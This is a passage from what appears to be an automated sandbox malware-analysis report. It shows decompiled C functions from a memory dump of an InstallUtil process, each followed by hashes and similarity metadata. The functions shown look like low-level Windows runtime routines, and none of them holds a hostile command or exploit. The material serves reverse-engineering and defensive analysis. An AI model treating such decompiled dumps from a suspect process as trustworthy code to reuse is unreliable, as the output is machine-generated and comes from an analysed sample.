                      												 *((char*)(_t99 + 0xe5)) = 1;
                      												 *((char*)(_t104 - 0x1d)) = 1;
                      												goto L21;
                      											}
                      										}
                      										L21:
                      										 *(_t104 - 4) = 0xfffffffe;
                      										E012C922A(_t99);
                      										_t64 = E012E7D50();
                      										__eflags = _t64;
                      										if(_t64 != 0) {
                      											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      										} else {
                      											_t67 = 0x7ffe0386;
                      										}
                      										__eflags =  *_t67;
                      										if( *_t67 != 0) {
                      											_t67 = E01398B58(_t99);
                      										}
                      										__eflags =  *((char*)(_t104 - 0x1d));
                      										if( *((char*)(_t104 - 0x1d)) != 0) {
                      											__eflags = _t99 -  *0x13b86c0; // 0xe607b0
                      											if(__eflags != 0) {
                      												__eflags = _t99 -  *0x13b86b8; // 0x0
                      												if(__eflags == 0) {
                      													_t94 = 0x13b86bc;
                      													_t87 = 0x13b86b8;
                      													goto L27;
                      												} else {
                      													__eflags = _t67 | 0xffffffff;
                      													asm("lock xadd [edi], eax");
                      													if(__eflags == 0) {
                      														E012C9240(_t80, _t99, _t99, _t102, __eflags);
                      													}
                      												}
                      											} else {
                      												_t94 = 0x13b86c4;
                      												_t87 = 0x13b86c0;
                      												L27:
                      												E012F9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                      											}
                      										}
                      									} else {
                      										goto L13;
                      									}
                      								}
                      							}
                      						}
                      						return E0131D130(_t80, _t99, _t102);
                      					} else {
                      						 *_t51 = 0x13b5388;
                      						 *((intOrPtr*)(_t51 + 4)) = _t84;
                      						 *_t84 = _t51;
                      						 *0x13b538c = _t51;
                      						goto L6;
                      					}
                      				}
                      			}





















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f7944c518827a9fa34157e30335168dac65b10f9319ba95b7f050d5878b8b175
                      • Instruction ID: 34cf85b0484e47565adc38f99e3db06ae230027b0783f3bea337d46505ef870d
                      • Opcode Fuzzy Hash: f7944c518827a9fa34157e30335168dac65b10f9319ba95b7f050d5878b8b175
                      • Instruction Fuzzy Hash: 2301F472521205CFC7258F08D880B217BADEF41B29F25416AE3058B791D370DC81CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 46%
                      			E0135C450(intOrPtr* _a4) {
                      				signed char _t25;
                      				intOrPtr* _t26;
                      				intOrPtr* _t27;
                      
                      				_t26 = _a4;
                      				_t25 =  *(_t26 + 0x10);
                      				if((_t25 & 0x00000003) != 1) {
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push( *((intOrPtr*)(_t26 + 8)));
                      					_push(0);
                      					_push( *_t26);
                      					E01309910();
                      					_t25 =  *(_t26 + 0x10);
                      				}
                      				if((_t25 & 0x00000001) != 0) {
                      					_push(4);
                      					_t7 = _t26 + 4; // 0x4
                      					_t27 = _t7;
                      					_push(_t27);
                      					_push(5);
                      					_push(0xfffffffe);
                      					E013095B0();
                      					if( *_t27 != 0) {
                      						_push( *_t27);
                      						E013095D0();
                      					}
                      				}
                      				_t8 = _t26 + 0x14; // 0x14
                      				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                      					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                      				}
                      				_push( *_t26);
                      				E013095D0();
                      				return L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                      			}







                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                      • Instruction ID: 83680dd5cad6d55fafd77d6f1de7c18347dea72b974fbb382b773fb3bc435be9
                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                      • Instruction Fuzzy Hash: 34019671140606BFE726AF69CC90E62FBBDFF5475CF004525F614525A0C722ACA1C7A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E01394015(signed int __eax, signed int __ecx) {
                      				void* __ebx;
                      				void* __edi;
                      				signed char _t10;
                      				signed int _t28;
                      
                      				_push(__ecx);
                      				_t28 = __ecx;
                      				asm("lock xadd [edi+0x24], eax");
                      				_t10 = (__eax | 0xffffffff) - 1;
                      				if(_t10 == 0) {
                      					_t1 = _t28 + 0x1c; // 0x1e
                      					E012E2280(_t10, _t1);
                      					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                      					E012E2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x13b86ac);
                      					E012CF900(0x13b86d4, _t28);
                      					E012DFFB0(0x13b86ac, _t28, 0x13b86ac);
                      					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                      					E012DFFB0(0, _t28, _t1);
                      					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                      					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                      						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                      					}
                      					_t10 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                      				}
                      				return _t10;
                      			}








                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1e05585023f259d9d185ed4a889202c920a052c07325deac2248f17fc6cc17f3
                      • Instruction ID: b2edef5342c7ec54f32cb2751ee0dac0267e7b1aa1ce08beea929022f61f4817
                      • Opcode Fuzzy Hash: 1e05585023f259d9d185ed4a889202c920a052c07325deac2248f17fc6cc17f3
                      • Instruction Fuzzy Hash: 5601F272251946BFC715AB79CE84E63F7ECFF59664B000229F60887A11DB34EC12C6E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 61%
                      			E0138138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				short _v54;
                      				char _v60;
                      				void* __edi;
                      				void* __esi;
                      				signed char* _t21;
                      				intOrPtr _t27;
                      				intOrPtr _t33;
                      				intOrPtr _t34;
                      				signed int _t35;
                      
                      				_t32 = __edx;
                      				_t27 = __ebx;
                      				_v8 =  *0x13bd360 ^ _t35;
                      				_t33 = __edx;
                      				_t34 = __ecx;
                      				E0130FA60( &_v60, 0, 0x30);
                      				_v20 = _a4;
                      				_v16 = _a8;
                      				_v28 = _t34;
                      				_v24 = _t33;
                      				_v54 = 0x1033;
                      				if(E012E7D50() == 0) {
                      					_t21 = 0x7ffe0388;
                      				} else {
                      					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                      				}
                      				_push( &_v60);
                      				_push(0x10);
                      				_push(0x20402);
                      				_push( *_t21 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                      			}


















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 38c600bb9314d74ea712946650ee9dd3577479bcbddb1a89b0ffd7871195f72e
                      • Instruction ID: 21a15b58ec9316deaad81fb380e53c95648e267226f0d7e435158d7b8fce8bf7
                      • Opcode Fuzzy Hash: 38c600bb9314d74ea712946650ee9dd3577479bcbddb1a89b0ffd7871195f72e
                      • Instruction Fuzzy Hash: 50019271A0030CAFDB10EFA8D841FAEBBF8EF44714F004066B904EB680D6709A41CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 61%
                      			E013814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				short _v54;
                      				char _v60;
                      				void* __edi;
                      				void* __esi;
                      				signed char* _t21;
                      				intOrPtr _t27;
                      				intOrPtr _t33;
                      				intOrPtr _t34;
                      				signed int _t35;
                      
                      				_t32 = __edx;
                      				_t27 = __ebx;
                      				_v8 =  *0x13bd360 ^ _t35;
                      				_t33 = __edx;
                      				_t34 = __ecx;
                      				E0130FA60( &_v60, 0, 0x30);
                      				_v20 = _a4;
                      				_v16 = _a8;
                      				_v28 = _t34;
                      				_v24 = _t33;
                      				_v54 = 0x1034;
                      				if(E012E7D50() == 0) {
                      					_t21 = 0x7ffe0388;
                      				} else {
                      					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                      				}
                      				_push( &_v60);
                      				_push(0x10);
                      				_push(0x20402);
                      				_push( *_t21 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                      			}


















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 736a3f387f139a6e86e67445ddd5a5be736e1edb5773144b2e9705210062e2d1
                      • Instruction ID: 46ae133aafad3f39343ff2e5ace901889ef7775265c58ebce748f4125970c9a7
                      • Opcode Fuzzy Hash: 736a3f387f139a6e86e67445ddd5a5be736e1edb5773144b2e9705210062e2d1
                      • Instruction Fuzzy Hash: FF018C71A0124CAFDB10EFA8D845EAEBBB8EF44714F404066B904EB280DA70DA41CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E012C58EC(intOrPtr __ecx) {
                      				signed int _v8;
                      				char _v28;
                      				char _v44;
                      				char _v76;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t10;
                      				intOrPtr _t16;
                      				intOrPtr _t17;
                      				intOrPtr _t27;
                      				intOrPtr _t28;
                      				signed int _t29;
                      
                      				_v8 =  *0x13bd360 ^ _t29;
                      				_t10 =  *[fs:0x30];
                      				_t27 = __ecx;
                      				if(_t10 == 0) {
                      					L6:
                      					_t28 = 0x12a5c80;
                      				} else {
                      					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                      					if(_t16 == 0) {
                      						goto L6;
                      					} else {
                      						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                      					}
                      				}
                      				if(E012C5943() != 0 &&  *0x13b5320 > 5) {
                      					E01347B5E( &_v44, _t27);
                      					_t22 =  &_v28;
                      					E01347B5E( &_v28, _t28);
                      					_t11 = E01347B9C(0x13b5320, 0x12abf15,  &_v28, _t22, 4,  &_v76);
                      				}
                      				return E0130B640(_t11, _t17, _v8 ^ _t29, 0x12abf15, _t27, _t28);
                      			}
















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 740928b1ef708e69add7b417a1fb864c5a8f35ed550e233896df95e21e15a389
                      • Instruction ID: 1e33279a4a6f05f92f11aa20b200c95db6b0302c82a25784a36a2940d06fe58b
                      • Opcode Fuzzy Hash: 740928b1ef708e69add7b417a1fb864c5a8f35ed550e233896df95e21e15a389
                      • Instruction Fuzzy Hash: 4001DF31B201099BC714EE28DC01AEE77ACEB51624F8402ADAB0997244EF30ED05C790
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012DB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                      				signed char _t11;
                      				signed char* _t12;
                      				intOrPtr _t24;
                      				signed short* _t25;
                      
                      				_t25 = __edx;
                      				_t24 = __ecx;
                      				_t11 = ( *[fs:0x30])[0x50];
                      				if(_t11 != 0) {
                      					if( *_t11 == 0) {
                      						goto L1;
                      					}
                      					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                      					L2:
                      					if( *_t12 != 0) {
                      						_t12 =  *[fs:0x30];
                      						if((_t12[0x240] & 0x00000004) == 0) {
                      							goto L3;
                      						}
                      						if(E012E7D50() == 0) {
                      							_t12 = 0x7ffe0385;
                      						} else {
                      							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                      						}
                      						if(( *_t12 & 0x00000020) == 0) {
                      							goto L3;
                      						}
                      						return E01347016(_a4, _t24, 0, 0, _t25, 0);
                      					}
                      					L3:
                      					return _t12;
                      				}
                      				L1:
                      				_t12 = 0x7ffe0384;
                      				goto L2;
                      			}








                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                      • Instruction ID: a73dbf0cb875d4c7fca7e731f774ee8b7253b532e8334ad503c79857733c615f
                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                      • Instruction Fuzzy Hash: 3B018F32221985DFE322971CC998F767BDCEB86B54F0A00A1FA19CBA51D769DC40C620
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E01391074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                      				char _v8;
                      				void* _v11;
                      				unsigned int _v12;
                      				void* _v15;
                      				void* __esi;
                      				void* __ebp;
                      				char* _t16;
                      				signed int* _t35;
                      
                      				_t22 = __ebx;
                      				_t35 = __ecx;
                      				_v8 = __edx;
                      				_t13 =  !( *__ecx) + 1;
                      				_v12 =  !( *__ecx) + 1;
                      				if(_a4 != 0) {
                      					E0139165E(__ebx, 0x13b8ae4, (__edx -  *0x13b8b04 >> 0x14) + (__edx -  *0x13b8b04 >> 0x14), __edi, __ecx, (__edx -  *0x13b8b04 >> 0x14) + (__edx -  *0x13b8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                      				}
                      				E0138AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                      				if(E012E7D50() == 0) {
                      					_t16 = 0x7ffe0388;
                      				} else {
                      					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                      				}
                      				if( *_t16 != 0) {
                      					_t16 = E0137FE3F(_t22, _t35, _v8, _v12);
                      				}
                      				return _t16;
                      			}












                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 41bed007b40f887e21d0c07aa394d0f1d5bb4a42f0f6cb03b849de4e559a67d1
                      • Instruction ID: 09d81a954df84b6cf98d8d20522c05de0fec8136db755c3f9411ab8a80058b75
                      • Opcode Fuzzy Hash: 41bed007b40f887e21d0c07aa394d0f1d5bb4a42f0f6cb03b849de4e559a67d1
                      • Instruction Fuzzy Hash: A9014C726047479FCB20EF2CC944B1A7BD9BF84328F048519F98593790EE31D444CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E0137FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                      				signed int _v12;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				short _v58;
                      				char _v64;
                      				void* __edi;
                      				void* __esi;
                      				signed char* _t18;
                      				intOrPtr _t24;
                      				intOrPtr _t30;
                      				intOrPtr _t31;
                      				signed int _t32;
                      
                      				_t29 = __edx;
                      				_t24 = __ebx;
                      				_v12 =  *0x13bd360 ^ _t32;
                      				_t30 = __edx;
                      				_t31 = __ecx;
                      				E0130FA60( &_v64, 0, 0x30);
                      				_v24 = _a4;
                      				_v32 = _t31;
                      				_v28 = _t30;
                      				_v58 = 0x267;
                      				if(E012E7D50() == 0) {
                      					_t18 = 0x7ffe0388;
                      				} else {
                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                      				}
                      				_push( &_v64);
                      				_push(0x10);
                      				_push(0x20402);
                      				_push( *_t18 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                      			}

















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7692f1cc8820ccd462c45bba104cb1ebf99b10e5efbde3488412264c2c9cc4e1
                      • Instruction ID: 0e2c0b950266c6710e48313111e9cdcab9c6b21b9c3768ac8982d437e9c48b85
                      • Opcode Fuzzy Hash: 7692f1cc8820ccd462c45bba104cb1ebf99b10e5efbde3488412264c2c9cc4e1
                      • Instruction Fuzzy Hash: 4201D471E0020DAFDB24DFA8D845FAEBBFCEF40704F004066B904AB281DA749900C795
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E0137FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                      				signed int _v12;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				short _v58;
                      				char _v64;
                      				void* __edi;
                      				void* __esi;
                      				signed char* _t18;
                      				intOrPtr _t24;
                      				intOrPtr _t30;
                      				intOrPtr _t31;
                      				signed int _t32;
                      
                      				_t29 = __edx;
                      				_t24 = __ebx;
                      				_v12 =  *0x13bd360 ^ _t32;
                      				_t30 = __edx;
                      				_t31 = __ecx;
                      				E0130FA60( &_v64, 0, 0x30);
                      				_v24 = _a4;
                      				_v32 = _t31;
                      				_v28 = _t30;
                      				_v58 = 0x266;
                      				if(E012E7D50() == 0) {
                      					_t18 = 0x7ffe0388;
                      				} else {
                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                      				}
                      				_push( &_v64);
                      				_push(0x10);
                      				_push(0x20402);
                      				_push( *_t18 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                      			}

















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f8cb953970ab0c8b0abd0c986c28d9a6913c18edce753894ff39387850637871
                      • Instruction ID: d2a922be3ac3a8f00b39da082bed76b326a6acd6dd988b2854a278b097571969
                      • Opcode Fuzzy Hash: f8cb953970ab0c8b0abd0c986c28d9a6913c18edce753894ff39387850637871
                      • Instruction Fuzzy Hash: 35018471E0120DAFDB14EBA9D845FAEBBBCEF44714F404066BA04AB281EA749A41C7D4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E01398A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				signed int _v12;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				short _v66;
                      				char _v72;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed char* _t18;
                      				signed int _t32;
                      
                      				_t29 = __edx;
                      				_v12 =  *0x13bd360 ^ _t32;
                      				_t31 = _a8;
                      				_t30 = _a12;
                      				_v66 = 0x1c20;
                      				_v40 = __ecx;
                      				_v36 = __edx;
                      				_v32 = _a4;
                      				_v28 = _a8;
                      				_v24 = _a12;
                      				if(E012E7D50() == 0) {
                      					_t18 = 0x7ffe0386;
                      				} else {
                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      				}
                      				_push( &_v72);
                      				_push(0x14);
                      				_push(0x20402);
                      				_push( *_t18 & 0x000000ff);
                      				return E0130B640(E01309AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                      			}

















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf39845fef08bf31d707c7ccc1564650bfa5635b98181df9522f80c8cd2aab3a
                      • Instruction ID: b7b82bff5becea5d3b93b9b5a400aec82f0222b6714dad9ed962c3bd8d8afb37
                      • Opcode Fuzzy Hash: bf39845fef08bf31d707c7ccc1564650bfa5635b98181df9522f80c8cd2aab3a
                      • Instruction Fuzzy Hash: 7D012C71A1121DAFDB00DFA9D941AAEBBF8EF59314F10405AFA04E7381E734A900CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E01398ED6(intOrPtr __ecx, intOrPtr __edx) {
                      				signed int _v8;
                      				signed int _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				short _v62;
                      				char _v68;
                      				signed char* _t29;
                      				intOrPtr _t35;
                      				intOrPtr _t41;
                      				intOrPtr _t42;
                      				signed int _t43;
                      
                      				_t40 = __edx;
                      				_v8 =  *0x13bd360 ^ _t43;
                      				_v28 = __ecx;
                      				_v62 = 0x1c2a;
                      				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                      				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                      				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                      				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                      				_v24 = __edx;
                      				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                      				if(E012E7D50() == 0) {
                      					_t29 = 0x7ffe0386;
                      				} else {
                      					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      				}
                      				_push( &_v68);
                      				_push(0x1c);
                      				_push(0x20402);
                      				_push( *_t29 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                      			}



















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 98059307ca46ef2f895c79a8212e2f32e2729b5d03461822d05652e01c21c1a7
                      • Instruction ID: b879142c0ab62f1a56b33a2d7c223b6c2c3a7fd144a86db89b63cb38a316e8a2
                      • Opcode Fuzzy Hash: 98059307ca46ef2f895c79a8212e2f32e2729b5d03461822d05652e01c21c1a7
                      • Instruction Fuzzy Hash: 5E111E70E042099FDB04DFA8D445BAEFBF4FF08304F0442AAE519EB782E6349940CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012CDB60(signed int __ecx) {
                      				intOrPtr* _t9;
                      				void* _t12;
                      				void* _t13;
                      				intOrPtr _t14;
                      
                      				_t9 = __ecx;
                      				_t14 = 0;
                      				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                      					_t13 = 0xc000000d;
                      				} else {
                      					_t14 = E012CDB40();
                      					if(_t14 == 0) {
                      						_t13 = 0xc0000017;
                      					} else {
                      						_t13 = E012CE7B0(__ecx, _t12, _t14, 0xfff);
                      						if(_t13 < 0) {
                      							L012CE8B0(__ecx, _t14, 0xfff);
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                      							_t14 = 0;
                      						} else {
                      							_t13 = 0;
                      							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                      						}
                      					}
                      				}
                      				 *_t9 = _t14;
                      				return _t13;
                      			}








                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                      • Instruction ID: 305c8e0c41c8dcd45664227bcf5d767fe6f03c052e00ddb5f8a1664adc55f304
                      • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                      • Instruction Fuzzy Hash: 0BF09C332715279BD7326AD9C8C4F77BAA59FD1E60F16023DF3099B344D9608C0296D5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012CB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                      				signed char* _t13;
                      				intOrPtr _t22;
                      				char _t23;
                      
                      				_t23 = __edx;
                      				_t22 = __ecx;
                      				if(E012E7D50() != 0) {
                      					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                      				} else {
                      					_t13 = 0x7ffe0384;
                      				}
                      				if( *_t13 != 0) {
